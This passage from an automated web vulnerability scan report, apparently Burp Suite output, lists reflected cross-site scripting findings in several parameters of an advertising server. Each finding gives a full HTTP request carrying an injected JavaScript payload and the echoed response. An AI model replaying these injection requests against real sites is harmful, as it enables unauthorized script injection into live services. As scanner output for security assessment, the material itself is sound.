AAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=803404e39a"-alert(1)-"8d72fc9941b&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectU
...[SNIP]...

6.40. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [crID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the crID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3689a"-alert(1)-"6360c3aeebe was submitted in the crID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=1108473689a"-alert(1)-"6360c3aeebe&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:04 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=1108473689a"-alert(1)-"6360c3aeebe&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2
...[SNIP]...

6.41. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [partnerID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the partnerID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4274"-alert(1)-"6749e576522 was submitted in the partnerID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9f4274"-alert(1)-"6749e576522&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:42 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9f4274"-alert(1)-"6749e576522&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2f%2fwww.tdameritrade.com/offer/250freetr
...[SNIP]...

6.42. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [pub parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the pub request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e70c"-alert(1)-"37993143f63 was submitted in the pub parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=2560788e70c"-alert(1)-"37993143f63&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:29 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=2560788e70c"-alert(1)-"37993143f63&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2f%2fwww.tdameritrade.com/off
...[SNIP]...

6.43. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [pubICode parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the pubICode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca208"-alert(1)-"8a30c001f0e was submitted in the pubICode parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910ca208"-alert(1)-"8a30c001f0e&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:17 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910ca208"-alert(1)-"8a30c001f0e&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=http%3a%2f%2fwww.tdameritr
...[SNIP]...

6.44. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a270"-alert(1)-"84104877d0e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-1108476a270"-alert(1)-"84104877d0e&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:49:41 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
zN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-1108476a270"-alert(1)-"84104877d0e&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Eh
...[SNIP]...

6.45. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.390 [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.390

Issue detail

The value of the url request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8a0b7"-alert(1)-"69532c69136 was submitted in the url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.390;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bf1f9c18805cba7f4%3B12fb0be2376,0%3B%3B%3B2888316814,smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAdiO-sC8BAAAAAAAAADE1OTYwZmYyLTc0YmEtMTFlMC1hYWUzLTAwMjM3ZDQzN2VmNQA4nyoAAAA=,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,$http://t.invitemedia.com/track_click?auctionID=1304340341814544-110847&campID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml8a0b7"-alert(1)-"69532c69136&redirectURL=;ord=1304340341? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?smUAANBtDABR84oAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABcOWgN9IsHCvhK0lkUX7yuRwW0ceklLOf6oZ84AAAAAA==,,http%3A%2F%2Fwww.theage.com.au%2Fnational%2Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D2052082148%26u%3Dhttp%253A%252F%252Fwww.theage.com.au%252Fnational%252Fchristmas-island-action-adds-to-villawood-woes-20110425-1du6x.html,15960ff2-74ba-11e0-aae3-00237d437ef5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 12:50:56 GMT
Content-Length: 9062

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mpID=80340&crID=110847&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Etheage%2Ecom%2Eau%2Fnational%2Fchristmas%2Disland%2Daction%2Dadds%2Dto%2Dvillawood%2Dwoes%2D20110425%2D1du6x%2Ehtml8a0b7"-alert(1)-"69532c69136&redirectURL=http%3a%2f%2fwww.tdameritrade.com/offer/250freetrades/%3Fa%3DGVQ%26o%3D199%26cid%3DGENRET%3B877237%3B62579218%3B239944197%3B41633480");
var fscUrl = url;
var fscUrlClickTagFound = fals
...[SNIP]...

6.46. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.684 [campID parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.684

Issue detail

The value of the campID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1445"-alert(1)-"98a4c2b7cc0 was submitted in the campID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.684;sz=300x250;pc=[TPAS_ID];click=http://ad.yieldmanager.com/clk?2,13%3Bdd3d96d5de90549c%3B12fb0be7129,0%3B%3B%3B1383521841,yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAKXG-sC8BAAAAAAAAADFjYTQ4NGNjLTc0YmEtMTFlMC1hZDg3LTAwMWIyNDc4M2JjOAA4nyoAAAA=,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,$http://t.invitemedia.com/track_click?auctionID=1304340361814544-110787&campID=80340c1445"-alert(1)-"98a4c2b7cc0&crID=110787&pubICode=1662910&pub=256078&partnerID=9&url=http%3A%2F%2Fwww%2Ebrisbanetimes%2Ecom%2Eau%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary%2Dprotection%2Dvisas%2Dare%2Dnot%2Dthe%2Danswer%2D20110427%2D1dwe3%2Ehtml&redirectURL=;ord=1304340361? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?yxglANBtDADv8ooAAAAAAN8.IwAAAAAAAgAAAAIAAAAAAP8AAAACCP9yGAAAAAAAvl8ZAAAAAABhNC4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAuB6F61E4AUBmZmZmZmYUQEJCQkJCQhRAAAAAAAAAKEBCQkJCQkIUQAAAAAAAAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBuXyB.4sHClCQE2nLULjPiaSFWBRhOjldZdiMAAAAAA==,,http%3A%2F%2Fwww.brisbanetimes.com.au%2Fopinion%2Fpolitics%2Fblogs%2Fgengreens%2Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,Z%3D300x250%26s%3D814544%26r%3D0%26_salt%3D518457643%26u%3Dhttp%253A%252F%252Fwww.brisbanetimes.com.au%252Fopinion%252Fpolitics%252Fblogs%252Fgengreens%252Ftemporary-protection-visas-are-not-the-answer-20110427-1dwe3.html,1ca484cc-74ba-11e0-ad87-001b24783bc8
